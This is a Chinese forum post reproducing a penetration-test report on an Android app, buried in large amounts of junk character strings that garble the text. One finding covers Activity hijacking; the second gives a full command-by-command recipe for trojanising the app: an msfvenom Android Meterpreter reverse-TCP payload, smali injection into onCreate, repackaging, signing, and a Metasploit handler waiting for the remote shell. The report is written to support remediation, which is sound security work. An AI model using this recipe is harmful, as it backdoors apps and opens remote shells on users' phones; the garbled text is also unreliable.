% W1 p9 X$ J, k/ s, Q' a" o1 ~% `( h" G

r6 [9 P1 w( M% F9 l @% c" c 6 c! c- j& p2 G5 w+ ]4 T 1-2 测试结果 $ J7 q: g1 x% g% N( n( I # M, L. E( q, u6 c4 B

Y3 V. `- b# T5 _6 G8 f2 G& p* D 3 G& l8 e) O0 `' j+ C) r) U( m/ q

( J- ?5 Q: a' |. }$ _3 e - h" c! J: R2 R7 M$ v   4 v3 C, p# E( @( R# S) z! j# @' _ % ?4 ?% h6 _: O3 A1 `+ M8 A4 w" c" I

" b6 }+ k3 N. i/ e5 X- e 2 E; a7 ]0 B* k2 B

* J( Z. J- Q% U 2 I7 J% C$ v6 }4 ?+ P5 Z3 O" X 2 检测结果                    # P3 l* t, ^! W$ C) ?" F: A4 b 1 g- ~# F* Y- c. y! y% T

& i9 s# [) O: a, x- o6 U2 | , B1 B, D. F% i& k- W9 K: X1 l

4 E( Q. N, d! G6 ? x/ }9 o, ]6 v, @ c4 P 2.1 某某某 6 s1 a7 m! @+ ]- ?8 T% f 5 ~9 i `! f& A9 [: Y' J$ G

$ }4 O2 h9 O& m; `1 e2 K- E / _/ G# [( `" {: ]) I6 f

0 b. S6 U* r) d: t " v5 R: n4 R/ T4 s+ `% L, ] 2.1.1检测目标 ~0 ]; z& r4 t$ v5 S8 x4 H0 {% W% Y- Z # K& ~( U* f6 p, Q6 n; s

8 ?: f/ B6 b4 b7 K. J8 N; ^6 @6 d7 G' M# ?8 {

1 Y% O4 i5 ], x3 A& C. I ' x" W! u h. q1 q% O2 K 目标地址: 某某某某某某APP 3 ^9 ^& q# ]" a. s) O/ g7 ` , `/ m* X, y* e& {& L( @

4 h# y7 [5 u' H0 z' T # Q' ~" l- x: x9 A% f, Q7 i p! o

- ^5 z+ x7 B: g; k- c: R ( I- Z+ [+ A7 J 2.1.2检测结果 0 g" E6 N1 }$ F# E! ^9 U * T6 @% \( ]1 P. H7 k

! y' M6 v1 v" `! h/ Z" k' m# E " }: r9 ~5 d8 g! p

+ H' p6 w7 W6 N7 V/ ~ - y& F! l+ z( M 2.1.2.1 , W/ V2 p" ^0 I: c: N , s/ c8 M9 |5 U' Q# V

- k. E( }# I, _/ X/ t7 v" f) w1 Z , `" x. \7 h8 V; b

- d5 B$ S3 p* e( N/ @7 O% T$ O * [ }4 Q2 K- h3 [/ H- V 漏洞链接地址:某某某某某某APP 6 }' p, X) M" F, L, w5 ] ! T0 S% [) }/ s7 }- I/ Q* ^ C

' E4 E* h( o. A( C4 B8 r0 B+ ] / Z4 s0 I, O: `( F$ {

$ Q, t6 s3 \2 `* _/ K3 ]9 ~ + }+ y6 e, o, J8 ^   + |/ T' d0 X( U( p) G- X/ g6 F3 c0 Q; E, ^- A9 S% E3 ^: g. U( w

" s3 N5 A. |- d* ?; x9 M ( L) O( }5 @& ~$ ~( h0 R _% C

& u1 W+ \- f8 n) _+ w" B5 S ( V* x0 L9 u$ Y( w/ _; W 漏洞分析及取证: / c5 a' d) J9 w* b6 {( D1 Q' C 3 G" N% V9 U2 d0 p4 ~ \

' i7 y6 [% L+ x " [. K, Q. s q* c2 V

1 S- f5 r8 I9 D# c 1 K6 X o% Q: d. E/ S4 u                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 1 [# ?- g" B7 L: {7 Z 1 x* I# h1 x' t3 g7 C+ Q# l% D5 T

' M2 n3 b+ D) i3 b 5 ]( u9 I4 N! ~% D6 K \

: s8 ]3 ?5 ?: o / e& @- p A* g6 P; }      , I! p- d) q# B" B' ^ q : q) R9 U0 `+ ~7 U

. w9 A( Q: A; ]; h' K- @ 7 c: C& v0 R: `$ p7 W, B

8 `' @2 g7 _! n! _ - v( L! @8 z$ Y                       N0 t: o7 u( _# ~ : c: H! _2 v% B6 {! h) I4 n

. S/ e+ R2 v7 } " O0 J8 t2 }1 L1 M8 f

- n8 O$ u7 U* u+ A9 F1 i5 |6 Z . C2 D9 |& J: ^) i 8 d" g! [3 f5 o/ T3 D# W1 V- r; K. X/ C; ?' y0 ^

0 U3 \7 j y Y% B; q0 W* x 2 F6 g, F9 M+ ^

: ^5 s! I8 U. _5 U2 I( j - n& i/ v8 B5 W, U7 j# S ; ?7 j' O8 o! d, K6 X& s ' ~( ]8 T! m7 S! r3 y: u# R

$ f8 U$ q7 t7 }0 i9 [ [2 b ' u; P5 {5 X. @6 V4 p

- a; U" v4 @9 o* ^8 W2 K; M1 i3 ~ / w2 I; E0 u1 f9 d + Z% T) k$ o ` |% T _& ?3 X+ `9 b

4 O9 j' ~. d' e; R' R 4 C; U w, d d# x `7 \

" {+ b2 M' X e$ e : t/ E _: d2 M, m: Z 漏洞危害:高 b% c; J3 c& ] ; ?0 P+ ^; a* N; k$ K* o, S% h

6 V# |: Z+ l! s3 H; }2 x, Q. n0 x ) g6 b7 \: ]' P& u
; C8 O9 k8 H" d, f- k* N8 g& K2 e ! H3 b5 d7 s' Y, o- K# P3 M8 v , a1 E! k2 W# t% K, Z# ?) M: u: |$ D. C. u; N! m0 [" F. y2 o, G. S* m# m8 i; k# j- q8 w% P% H0 _. u3 N. \8 c2 x [( F( v; Q0 B1 A2 c; U. x% s1 j* G, W" v8 g! x- I6 ^5 S8 r; p" E3 H7 f7 w. b+ H/ T# w& G$ E2 a1 k1 c0 x* n+ B1 B. Z8 u3 h$ k, v7 m8 s `9 H+ g1 c1 H2 o/ c0 U: O. C( D2 B L& f" _- `& C. d+ s R I. s8 `0 R5 E+ x3 `) _' g4 P- A/ R* R! ]. l3 m$ b9 j. e; y/ P. A$ [0 p# ?2 e5 J8 z- z% P( {% G/ R) ~! }: O2 ?) q1 h8 F* Q; w' W( C% U8 V! L8 l8 |6 k% p* |" V: f: y, N Z- i, R* c/ l1 B+ r: o; r) N$ n: \5 v$ S: s [5 d+ j; _" t5 R/ m1 ^$ `; }; t) }6 M2 W$ X2 \2 u, G; m# G; W6 R' g9 l
( S; ]. p1 ?" R/ [& Q" H5 R ; E' U8 b$ S [# ^ G, J8 y/ a

; j1 o8 G/ H: i( z6 Z { 1 H( g% i3 A$ P# q% ` 严重程度 & R* W, t! h# _& E' `/ F/ ^9 B 3 _0 @" W4 G/ E) k& w

; B ?3 }$ c/ d. d5 u 8 i; x- M* F4 l6 X9 K 		; S5 Z% Q2 q* a* Y + N0 s! X( c7 ^& p

1 x& t# j4 _$ P% s- x7 Y4 t, z0 }1 _/ C ' A. e4 e7 j7 I- \" r5 O7 i3 x - K/ O! p+ g% \/ w6 k

4 X" J7 [ b4 m, [4 w+ d2 z) `2 \+ [( J0 W. l2 D' x8 w! o 		6 U) U( O u$ a " B4 P) e7 ?" R' j" ] Z3 L, U

/ d* Z, A) H0 s + l5 u# c. N2 o9 L+ N' z7 V% u 7 W6 ]7 A, G2 w/ J) K6 E0 ~1 o " x, Z; Y# a* X, Z2 s% l. J! H

( G1 a( D7 P* E Q$ i6 S6 @ N 1 E# e8 [. \ d( ^0 V7 K" E 		! s5 k& r7 D8 R, G3 e8 k " x6 r( j& d4 ?

' S! ?+ ?4 S, m , h% T* k1 C' ~$ v2 N% ` 2 t, i2 q$ R1 u% B# L3 M/ c4 ^- u0 G0 B+ w3 [2 h

5 _1 C. }$ S2 G6 b 0 E# V2 p3 b4 ^. K; L8 G$ Y8 m 		8 R \. c9 g* a6 o$ V7 ^ - }, X0 s, ^3 x# M) {9 n9 z

1 t, X6 |- `( |1 ^5 q 0 y" I3 ~+ F: g2 G) @   / U, h: Q8 ?+ T1 f6 I 0 v! Q' J$ c( U& p3 b4 L

. r+ t8 ^, l+ w1 `0 L) d 1 b4 W) Q, D; S0 h; m% L 		1 l/ U/ x9 \2 i! e0 d# K) _. F; t( J0 k4 a# S! l/ \( D8 @, [

9 J7 c' x( @! ?2 C& j% O+ [' R ( X$ j$ Y# m6 P& g / T) y: }6 f. N; t 8 I/ y) J* L8 |& T4 p" q4 ~

# {0 I0 }6 [9 c6 `- m: e5 ?# Y 7 X D! S9 M9 ~( k+ n1 W 		# q* g, ^, A$ ?/ Q0 J8 X. z* _ : r8 B& J* K$ L* f

) y5 \$ z2 a- n- {0 `, H# K- z8 ] / |" M: Q k) Q9 i% [   0 I5 D8 j9 l9 ~ y ' q: |6 Q) C! {- ?4 m! w2 {

7 g& H! {) e6 R ! l: c: B' y+ `' B0 y
% }. M+ S3 \1 G2 w; \. a/ h4 v; D a5 Y! O$ [4 k4 d5 F
4 W' e+ O* A' x$ w 3 h6 V) f0 r9 O) o& g8 u

% m y/ s3 y! V ) f) S S9 x) A# |) n. _% k6 p   . h( L' S1 ` c0 @2 P $ P! C2 k1 B6 ~& z5 A5 K v* G

/ v2 [; X6 E( u0 p$ s8 U& w% e1 I- ^- r1 s

, b7 `* i; p" e, | / n3 I H& o% Q$ f, C9 P 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 8 r% c0 x6 k3 X7 \8 e9 d* h* D # K, ?) p+ ?2 C0 T& J

' _: C% ?- o c+ ]: X : {- x* f+ M# \2 y

4 }+ ]& p# y0 R. o # t( _$ G1 M1 s: _           3 T- g& T+ ]: ~, H 2 ~ E* Z r" p7 [4 }# W

5 {' ~, ^1 S* K5 c: k" C) o ( r) R( r7 t* u M: ~9 x" C

- O& T3 Y7 v0 v; g 5 S& R4 F/ N8 U1 ?8 |; Z4 H1 I   # o/ m% l( W& o+ H7 D; I { " C: Z. Y+ s8 k' q

3 W' r* D' t6 @$ a 9 m, }% d' B: J; x

6 g: T0 W. b& p4 V) T4 K. `0 A; |& Y0 H9 S1 m) ^) `5 L& b 2.1.2.2 9 R, ?. n9 O3 Q1 f( o) I/ f ; Q# G9 s' n% e+ p+ S

$ o" i, m' ~3 ?( b% `, A) W+ m7 y9 U# `& @, G

2 R* [* L' i: T* w8 ? ' l3 {. C# @8 T. @ 漏洞链接地址:某某某某某某APP k. B2 }& P. |2 X3 C2 X& u & ?+ d! y- }0 M# ^) q

) w' x- L x& t6 [6 T ; E9 L4 L/ K& Q4 J$ e3 i R

( q: f& s7 a. L6 F3 { ; l' N2 q2 _% e) y! U! T6 m 漏洞分析及取证: : r3 M6 u$ i K% A , k+ b, U, O9 c. w" ?% Y- ? d! g

# U% d' ]/ M4 V3 n5 [+ d0 d" ~ G- w2 y" a9 `1 }9 G

5 Z* M. E4 X6 Q & d" L W1 W5 p2 A* d8 t( X0 v+ `                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: . v S+ u% Z( I, j6 K * s, p$ Y& v, u6 s8 _

$ e9 }, L5 Y2 s* D 8 @- m& ?2 N$ p3 ^2 F! O0 y

4 M4 z( S7 [6 ?0 S, w 6 Z: N8 W/ p. y) _) |& b% b: e8 l Metasploit 生成木马 apk # p/ d- t( V5 G/ A5 x: r ; {/ ?" _3 a. P, q2 ]+ X6 P

/ U9 }/ s) F5 y, T 2 [! z! A7 V, a$ d* K7 |9 b8 x2 ?) b

/ L0 q; c0 n r4 x3 w7 I' z 8 a. S% W8 [; U0 f msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk $ Z6 P& y0 ?/ B * T5 L5 E* i2 B. C

% Z( u8 H0 Q* `; T7 c' g : N: g, @% t( C( I: W$ w& S

' |4 ]# O0 B4 F" \8 T0 z- p6 g ! O( n( w; |/ B' o2 { 反编译目标apk和木马apk 2 s$ a% Y4 G- P% `$ j, |5 k ; f% Q: F4 S# r; V/ D, B

, X( r6 N& p: R3 v1 T ( R, t0 u* Z* }8 a `

* Z( r# S1 M9 ^" d- n2 ]4 h, u( [ |$ r& J* k- a apktool d target.apk
- O* C7 r/ W. U . Z& U2 S" m h2 z' f apktool d cockhorse.apk 0 ?! E' t5 y3 B! U& s- p: F' p& ?2 b

; f# n! N$ ^3 {( D " Y' T7 D2 j o: j

# _4 k2 [' L8 L8 X2 h , _, w1 A- Q! T8 H$ |* v/ n 木马 apk 注入目标 apk 9 P7 y, r0 ~; ^, [8 e 2 T' W- l, ?" W) @/ m! C

! M0 U R4 z# p; Y3 { + w: ]( }/ S# h8 W/ w$ ^. H% C/ E

+ n9 q0 m) }3 } t7 m" B) @: { 8 f1 f( v) Y- R- H, C0 f Q 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
x4 H) d) B1 X2 M- p ( E' o4 x, Q( q7 A6 V+ f6 o invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 8 G; t% h$ j# n6 i$ f! p% P 5 f" ~1 R( z5 U

" l" d4 _5 a" D/ \* ^! L6 ^5 Q ' [* F. X4 r; r

8 s; I$ ]0 C6 D; }. ~ B" p , Z6 d- y6 b' k- m: u' Q# f 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 7 ~3 q# w4 \, B4 U$ W7 [4 f; { ' Q! X- Z, B. C9 r0 ]9 ~ k' Q6 B

% F/ [ K, v: F+ r * M# R5 r6 ^5 f0 J

$ A u: r, C3 L, s8 m2 O 2 O! Z7 H$ b% w 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ , b l. z. N& V e& \2 S! l2 n) ^9 } / a' E7 h0 g( G s L

5 s6 {& Y! V, H / W. d* Q) _6 X

t4 j, _" w# A, B& [: ?/ g 5 ^9 J4 E; t- O% f. H 回编译生成最终 apk 9 s3 [. P" ~7 E, p: ]4 X Y% y4 b1 ^1 W' _0 K

8 x* n% V" b3 [, z9 F( o # ?: w9 p" f8 Y

9 d- t7 R2 W! X- M4 N, Q u' S8 w! [: x8 A+ A 重新打包 / q* ?$ F/ m3 o. h( H' j2 ^/ N4 {% i3 D4 L. C

1 \5 M# O, B1 F% @5 H& H 3 r8 O' n$ N8 L3 ~( }: b

8 \+ Y6 B9 B9 e* r" a) \ 7 X$ u8 H! a' h4 E apktool b -o repackage.apk target_app_floder 3 c4 V& t- S) j2 v' @- ^ 0 x% Q6 b/ H' N5 H

# @ g* d W6 ~/ F) x 7 |& P2 R4 D' W

! ]- {* r* ~! a" u6 ^ ) p: z0 u* p1 K0 |8 k 创建签名文件,有的话可忽略此步骤 + P- }6 {( d# Q% y! } 7 n4 c) j% a- O1 e4 d. d) P

6 d; @0 ]. w, d% G3 @ - [( ]/ q9 i1 p1 x% z% O& V

4 b+ o4 @! u$ U" B; G! S 6 P2 [8 _1 P! n- j keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                # p6 R1 J1 e% D2 c/ ~' I 9 y# B' Q# _! _

) I5 R9 x) f5 w9 {' ?' E6 d5 g& C+ W9 k/ u2 p

( ~* }0 a: p' c0 c- p: T0 A ) _9 e+ r9 x% a; \" n( N# w+ L4 s% L 签名,以下任选其一 ) R. K5 `- E7 U3 C" s 8 b/ F* h: O: v8 G

* \+ s+ G0 Y: p6 F 1 g2 x o4 ]8 D) G& F" x5 v! t

/ d5 B) c0 Z- W- } ) J5 v' Z" k0 Q2 F4 l jarsigner 方式 3 Q4 ?) c2 }3 C$ x9 b* j, O: o , t1 H* G( ?! k+ L" O

- {' \ {! _( A" j6 w1 k # {/ v# w# h$ o

' Y+ ^# b) \; e- D" j& ]8 l2 V " Z8 A6 [, e" G& [: ? jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 5 D+ ]; p6 j K/ I. Z8 a2 @$ Y( x7 J& g

~2 ^* L J: T2 K, \) U3 _' e3 x8 F

* A; r/ _: m j 4 j8 }* n% m$ ]. U4 m: Y" I apksigner 方式 |& d/ i7 k6 ]3 m- q C. A: v. M$ n5 U5 |* b9 b* }3 Y# q

& p8 V' H a' G) z1 F/ r . E4 n: _' M8 P

& L5 B) p% \& k! E! k( f * o! Q% \6 |+ d/ g& D8 C apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 0 ` f1 D% t* ^+ o! \+ m: n3 K; n . B5 u: _, s% E! a; J! w8 B

" \ v1 K$ U- ~ \1 R+ S+ A1 Q& c7 Y, @+ T1 H

; r- |0 Y% D& b; r' J* J* r 7 A2 [1 I' b$ D+ Z* @: X, A. t) ? 如需要禁用 v2签名 添加选项--v2-signing-enabled false & t! D, h3 O, N+ c & d7 k5 w$ S' \

0 |2 ^5 y# l3 M! b' P & H$ b2 u. ]3 d

1 n9 b9 P9 y5 E' C 4 e* ^; v- W( C0 L7 R' O 验证,以下任选其一 9 u5 F1 p, ~$ j; `! I3 k 2 N7 m$ f; e9 A {2 }

' f1 K* c6 r4 U3 s & M* a# t; r) R+ }" H p

* {1 a. E3 N% ?' I6 A5 j, I2 `' U7 j9 X, h! t5 j4 o J jarsigner方式 ; d1 \; L4 j. ?# M- y S ; V. r( [ X9 _

1 `, ?3 l* p& e- k# ^( { 8 A9 q2 N1 v) S. r- s# A

$ [6 |! C- [, o! z# [/ O2 ^0 G3 n7 X- F jarsigner -verify repackaged.apk ! k, @' U& _. D9 c / F/ j. r) b, V" s" k1 Q

' s; B& C, i/ w% {$ l T4 z: \& S# j- G( x4 R0 h6 R3 }% s+ c

! m8 a1 B. H1 k 7 C- m2 T# J$ c/ f4 b; U! p" a apksigner 方式 5 X$ ?& \/ J8 {4 j5 }' E8 `) t. y3 E' e8 d9 s: w, l" V3 \# ?3 ]

3 \8 O3 L, \! Q9 h- J- b/ |; m , Y5 u0 G9 }: G5 ~1 V+ ~

0 r7 |7 }: g2 l, L3 ]! ~) [9 Z. @; q6 \' Z apksigner verify -v --print-certs repackaged.apk ( w2 K0 m u" I; n( Y0 t 5 ~9 A& I9 z" v& v, N

3 D& A" f4 L0 H/ a* o ; A4 Y7 @! t9 U) u

8 }* i7 I" M/ _ 4 H7 W7 T7 \% _ keytool方式 ) A) i9 N% _. l % y; g! U: t( }2 ~) S

5 N+ K* w Z# t5 @1 X8 a + M5 \' ?$ f2 i' ^" g) T& v

" j; r8 t ~5 d+ f. H( M& ] % q. ~3 s( G9 [. | keytool -printcert -jarfile repackaged.apk 6 }, _8 C" W' M6 l& f9 K. U ! t9 M- X" E1 R! @; z

( i7 f2 O' m% v& W " t$ {- g8 A1 h' U: ^& Z/ O

2 e, p* f' j1 u, s& _ + A6 M/ ]3 U1 k 对齐 5 A7 o, M9 t, i0 ?6 c5 l7 F) ` 5 ^. P; e5 Z0 L( J; k

% F9 I3 z- N) a7 d) O. @9 F7 h- s. i$ i

5 y# u% E. t% C/ u% E: j% ^1 ~/ E 字节对齐优化 7 A* D2 C. T/ b $ `$ a9 M; b/ Q' y% O0 a! J" t

; ?: ^- C* g; e1 u7 b 2 ~7 [& W0 G) v @$ c5 p" v

% s( s% l( T/ ^1 k; L- x w7 _! g5 W zipalign -v 4 repackaged.apk final.apk % x' D# Q4 {' M& K2 G4 A( f' _# \7 a( ^9 j; {2 `6 ~( e" s

$ M* V- k9 {* {9 Z' u# K; x) y ; f8 c$ v+ b% O! K2 V

4 }' _ n; G+ I 1 y' O* D+ c! ]& O) L; W2 v7 ^ 检查是否对齐 7 V$ J# R/ A* e# y# C' o, Z ( o- f0 n6 s$ b s5 M6 A& I

7 q' k/ C( P# @# Z0 A4 [3 | ' G% ?, y/ t9 ?/ @9 W9 J! m1 l+ H

7 r4 L% v/ a" o7 h9 h9 P9 r4 R: e # X/ J7 i! {! b% T7 t zipalign -c -v 4 final.apk % q$ L" `) M( T% G" P$ z( G $ w0 R9 \2 K/ d1 x

. x3 B' d z3 ]" Q1 _4 e 2 _; v+ u# ^$ @/ P% c$ N* {

2 H, y" [$ v# s6 V; s : C9 ]/ R4 n9 ~ 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 9 j) Q; X) F, e0 `+ K n' {$ M s$ x1 q/ [+ V9 S

2 Y# a2 L2 T+ j- e' q3 m- r- _* L- w

" ?! i+ y1 L' g! J* ?* w% i" _7 e 启动Metasploit控制台,配置参数等待上线 , n. C% I4 K# p5 S2 y b - @8 [$ k! x; N0 S; K* w3 O

, h$ l% K- J- J$ e2 h, {+ e 8 {9 c. w6 [* M5 [9 A/ G9 s' H/ E

" F' a. A9 M$ S6 m0 i8 P! P1 H/ S' i 在终端依次输入如下命令 ) k* G" J& x$ ^3 _4 v+ o7 M 4 X* p1 ?& L: i2 y0 C; Q1 W0 v

* I; T; @0 K1 M 4 R( I6 l1 [2 O5 t0 n9 D" y

7 C7 C; X7 b2 l) ?% p- T: R6 Z: e6 M1 ]+ H. Z$ c# n+ T msfconsole . Y8 Z- ?* V$ S" q' z , \' I, H9 U2 T! \& B+ j

% A) l$ Z4 V' K1 y 6 o7 n G$ y0 C, c `; i

4 } S; H/ _2 x6 x9 F 4 ~5 O+ [/ [ ?7 Z use exploit/multi/handler [$ Y& ]- X8 Y: M - i/ c' g y3 @* ^, p" t0 o

6 p/ R% U* K" g4 W: N% n- ?- q" R

5 J1 m: i* d) j0 S& A. C6 o U* Y* f: g4 Q: l: {$ R8 M set PAYLOAD android/meterpreter/reverse_tcp : v8 t8 g, w2 X6 n. D4 [5 z8 K 7 |/ A, M. G" ~7 ]8 y

' v m% @ E& u) {/ z7 o2 ?% v; L& \) I

7 x1 d( J$ S; w+ y' {% A4 f & ~3 F' b! v9 T9 V4 n ` set LHOST 192.xxx.xx.xx 6 N( i) ^1 V4 q. E 6 z: w$ ]) @! B

3 G) e8 A( k$ D. z: Z* Y 8 ^: Q( U' F- c" J: W. q

1 A! A' d, |5 H; _; m( C ; o; W2 |0 a+ P$ _0 y3 x( i( p set LPORT 4444 + K- b. @/ O! D( x) l5 s& p / R7 ^0 ~: e! E$ c

5 |, a x4 T0 `; a/ d* a! g) n+ I

% ]1 r* ~0 ]0 Q \ ; p" N8 U3 m8 k1 F exploit 5 G0 {7 G2 {& l" p # m9 |+ y& Q, y& ^/ N+ Q

& ^) s. H7 r% R- _3 G 9 c! _4 a Y# T

4 J- s* `4 @* g- ~" w [ % @+ m6 a1 k0 x% \ 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               6 J" f' s5 S) W" @. Z4 \5 n0 _/ r W+ B; n$ G- z/ q C

7 W: J4 _+ h( V1 r/ @+ x 1 m+ }/ S* j8 c; v9 Q/ }% R% t/ F

# Z9 S) i8 h* p/ ?5 i$ T- S7 F2 L4 _$ J! |6 I7 T 漏洞危害:中 - [9 v5 Q. J5 T. N7 h 0 W/ J& S6 ^0 B6 u

' U" Z+ Y: l8 w3 w! g" z4 B6 v 4 t4 {# I7 O4 ^7 w N# H: T
/ U- l+ V7 w+ }3 y6 x0 E4 F$ C3 Y' h' b & Q+ T4 ~% t0 p7 H: d% P4 N* W8 [ Z& n& t+ A& c. t0 Z8 A 7 M5 f3 I# O. `1 c8 f. v0 c8 R# `$ N; z) C, D& e+ }5 }+ p5 y- K: j, l' G) n$ n9 Z7 ]! y3 _) E; J! F/ e. P2 r6 a6 L) } c, U. w1 p% q6 J+ |9 F; y! ~2 f, _3 B! M6 D- z1 p! w6 n2 e6 t# l: C1 j; p: @! A, t& U+ v4 z. r V/ I, V( U2 F: e1 k( D6 Q5 ~% @1 ^3 h/ b" g5 I& H! Z" S6 v0 Y2 A+ i, y1 q' I% [- ?5 F# x" M2 O ?2 k: l5 ], |* }! }- ]- Y2 u* Z y, A) f' o+ ^3 k- A+ ?6 c" f, q' ^$ y; T) ~; ?9 Z4 Y$ ^+ g! B0 ~' p5 h# c: Q: r: _* J3 {" k7 t3 ]' m4 F# P" W" p( _3 x: o2 p3 B8 P% t4 ?# ?- K2 N! b, Z: [4 V% a5 q7 B8 P% ~" q- B6 e" k n: w5 U+ L( T6 S( V9 c; _0 Z; e6 I/ Z
. G( d& N, [7 ]) C# Q & L. q8 e+ f) Z* k) ]

+ q3 ^0 A) X5 S1 E3 Q n( w3 m5 H7 ^4 H# n* S 严重程度 i. Y' B+ t: F7 ^7 @8 S # f" H) H8 m9 w& @

, j( o3 ?3 U/ `, l9 l% `6 f3 o0 c: V 		/ g* d$ c8 o0 T0 v8 | % T& N' i1 C& n y, t

- w; E/ u, c7 X5 V1 p" x x! I' u ' f/ K# h$ U4 h# u& i: ` % H) g8 J/ S/ m- `3 U' \8 e* u$ g4 L, p2 D7 O

5 M! h( d/ t) k8 Y+ O; S: W! \ m6 b& u L5 I$ J 		, x3 d3 N( A; ?% h# E9 D1 S' K$ A5 [: x; W2 g

( T# x9 @3 e* C0 c ( ~1 `/ s4 h. A4 W* w- q9 B& K+ e6 p( F : M* ] b) C& k4 q$ T2 u1 ?1 P. F+ G4 Y. v* Z

3 U8 ~4 l0 E8 j' }2 Q; j 9 w1 Q6 `; a- l9 K7 J0 R+ `, s 		2 b8 J! v4 d( k* u* F) W' i $ d- G- |6 g ]1 w) U4 k3 L# a q

7 J( [8 ~: D: Y* C ' C' R5 Z+ S; T * y7 W0 s. r# a! | ' c# J. U4 }' i3 n

& ^" m$ U. o- S: v7 L ( |% R: I- }, H 		) q7 q3 t* ]7 K( z8 _+ n$ O3 { 2 T! g( i6 R$ t% _' ]4 s7 o * e1 T1 f% a, ?' o : J& W7 p. X6 ^7 |8 c6 i1 ~, U

# g% l1 C/ w) _ . t3 ]- H( b2 e; q& [   2 f' O {8 d# V7 f7 Q, @ 8 G4 {$ B) b, c7 o. G; F

% Q! i6 U: V0 j+ ^1 G) H8 [- l4 i; H+ Y 		5 w3 o3 ?" i& t- L1 N 7 o$ M D& v# X$ S5 G

" x2 u+ B! M+ N( u2 u9 R5 R. e: P 8 v* I9 s6 J: \% s0 a) s . C2 I' B0 x" P$ d2 x: M" r * e, g4 k1 J' h4 R; C

& a; c$ X/ `9 z! X+ n1 H7 H ( o2 x' [% a8 W# K1 q5 ]0 w 		, z5 D7 p7 B& Z: J0 p! y8 x 5 h& z: e7 L( p+ P/ p G0 y5 p* E+ q4 r. L' p- w- R6 h `6 A0 S

8 u! W+ u5 |# L5 m. O9 V' V) c - J# ^; _4 y1 J& g; [! P. z   $ t8 X* o" o6 ^$ `, ?1 F8 W N E, n% z; _9 j7 k

3 g, ~/ P& \$ J2 \( D$ S - ~7 Z3 A0 q0 u1 X* I, P
. n& x+ F1 O1 J; r, I 7 W9 O8 U8 [1 r0 H( O% S1 i4 P
: o$ S3 m, l! {: z9 ] 9 a( q1 s E+ X! {% f

% d8 V+ T* U3 k5 x4 M3 q. U3 S" B$ `& p- V6 o' h$ K8 ~, _   5 t0 U1 B k1 Z; u4 U* l0 [& `( r ( H" r& Z% D, c3 m5 o

$ s8 u' n+ e4 V% g- D5 f& i7 m# R& H7 d7 P

. _# a5 S" X- ]4 @' O {7 i* m# T* r$ P3 A3 Y+ [8 U 修复方法: & Y- }5 f# H. b* {5 d& {5 q9 N" @: {4 l0 I( M

4 s/ e3 V, N/ J 8 _9 Z( C6 {# L+ q

+ B8 Z5 z* ~" i/ |$ u/ p" z, \ C $ V3 [7 k' w) U6 N6 o7 o3 X' }               1. APP 启动时应做签名校验防止二次打包。
5 V& K8 u( |; O6 s% U4 L! ` 2 i6 @4 c5 U1 W5 s 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ' n' j/ D+ q* p; |* [ ! g) B+ L% D7 F/ X

% y: Z5 h6 @/ }' ~ 9 [' Z& k. O# k: G w 3 U0 {& n" S% I# z2 j; f+ H 2 m( `: G# d6 j6 V0 m9 c/ r

" w# \! K% f# @+ z1 T% t$ ]9 p5 h: \ 8 S1 [7 x* N6 R! n1 d( h- X   & ]/ ^0 O/ \% \' h4 d( r* D. V6 H # t) K. A2 U9 ?8 E

6 I7 g4 X9 n. O, s' a, y& Q + @0 Y. [# n3 v j D h1 L6 L " @. }/ {8 J) ?1 p! h) L( r/ B$ b9 P9 e+ X" V

/ W) B% L4 d* E: v + h' i' n8 G) K
5 S/ n+ y8 Q- u$ P- q, [, Q ! n( M! D3 y: q t6 G

`( H' ^6 m) b& r, F( V3 I ~- `7 c7 T) r( Q8 L- }3 M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表